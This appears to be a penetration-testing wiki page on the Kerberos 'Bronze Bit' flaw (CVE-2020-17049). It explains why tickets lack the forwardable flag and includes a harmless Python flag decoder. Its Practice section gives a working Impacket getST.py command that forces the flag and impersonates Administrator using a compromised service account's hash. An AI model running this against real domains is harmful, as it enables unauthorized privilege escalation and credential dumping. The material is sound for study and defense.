# Bronze Bit

## Theory

When abusing Kerberos delegations, S4U extensions usually come into play. One of those extensions is S4U2proxy. [Constrained](/ad/movement/kerberos/delegations/constrained.md) and [Resource-Based Constrained](/ad/movement/kerberos/delegations/rbcd.md) delegations rely on that extension. A requirement to be able to use S4U2proxy is to present an additional service ticket as evidence (usually issued after an S4U2self request). That ticket needs to have the `forwardable` flag set. There are a few reasons why that flag wouldn't be set on a ticket:

* the "impersonated" user was a member of the "Protected Users" group or was configured as "sensitive for delegation"
* the service account configured for [constrained delegation](/ad/movement/kerberos/delegations/constrained.md) was configured for [Kerberos only/without protocol transition](/ad/movement/kerberos/delegations/constrained.md#without-protocol-transition)

In 2020, the "bronze bit" (CVE-2020-17049) was released, allowing attackers to edit a ticket and set the `forwardable` flag.
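The `forwardable` flag is one bit of the `TicketFlags` BIT STRING stored in the ticket's encrypted part, i.e. it is protected only by the encryption under the service key. The following Python, an added example not taken from the page or from Impacket, decodes that DER BIT STRING and applies the single precondition discussed above (evidence ticket must be forwardable); the byte strings are constructed samples, not captured tickets.

```python
"""Decode Kerberos TicketFlags (RFC 4120, KerberosFlags BIT STRING) and check the S4U2proxy precondition."""
from typing import List

# Bit positions from RFC 4120 section 5.2.8; bit 0 is the most significant bit of the first byte.
TICKET_FLAG_NAMES = {
    0: "reserved", 1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may-postdate", 6: "postdated", 7: "invalid", 8: "renewable", 9: "initial",
    10: "pre-authent", 11: "hw-authent", 12: "transited-policy-checked", 13: "ok-as-delegate",
}
FORWARDABLE_BIT = 1


def decode_bit_string(der: bytes) -> List[int]:
    """Return the set bit positions of a DER BIT STRING (tag 0x03, short-form length only)."""
    if len(der) < 3 or der[0] != 0x03:
        raise ValueError("not a DER BIT STRING")
    length = der[1]
    if length & 0x80 or 2 + length != len(der):
        raise ValueError("unsupported or inconsistent length")
    unused = der[2]            # number of padding bits in the last byte
    if unused > 7:
        raise ValueError("invalid unused-bits count")
    body = der[3:]
    total_bits = len(body) * 8 - unused
    return [i for i in range(total_bits) if body[i // 8] & (0x80 >> (i % 8))]


def ticket_flag_names(der: bytes) -> List[str]:
    """Human-readable flag names, in bit order (unknown bits are reported as bitN)."""
    return [TICKET_FLAG_NAMES.get(b, f"bit{b}") for b in decode_bit_string(der)]


def evidence_ticket_usable_for_s4u2proxy(der: bytes) -> bool:
    """The S4U2self ticket offered as evidence must carry the forwardable flag."""
    return FORWARDABLE_BIT in decode_bit_string(der)


# Constructed sample values (not captured from a real KDC).
# forwardable + renewable + initial + pre-authent: a typical flag set on a usable ticket
FORWARDABLE_TICKET = bytes.fromhex("03050040e00000")
# renewable + initial + pre-authent only: what S4U2self yields for a Protected User / "sensitive" account
NON_FORWARDABLE_TICKET = bytes.fromhex("03050000e00000")

if __name__ == "__main__":
    for name, der in (("usable", FORWARDABLE_TICKET), ("blocked", NON_FORWARDABLE_TICKET)):
        print(name, ticket_flag_names(der), evidence_ticket_usable_for_s4u2proxy(der))
```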

## Practice

The [Impacket](https://github.com/SecureAuthCorp/impacket) script [getST](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python) can perform all the necessary steps to edit a ticket's flags and obtain a ticket through S4U2proxy to act as another user on a target service (in this case, "Administrator" is the impersonated/delegated account, but it can be any user in the environment).

The input credentials are those of the compromised service account configured for constrained delegations.

```bash
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account
```

The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)).

## Resources

{% embed url="https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-overview" %}
